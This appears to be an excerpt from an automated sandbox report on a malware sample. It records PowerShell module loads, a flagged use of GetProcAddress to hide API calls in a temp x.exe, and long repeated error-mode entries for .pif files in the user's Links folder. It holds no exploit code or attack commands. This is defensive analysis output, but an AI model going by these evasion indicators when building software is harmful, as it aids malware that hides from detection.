Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 3_2_03F664E4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_03F664E4

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\Rwelpqci.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Links\icqplewR.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
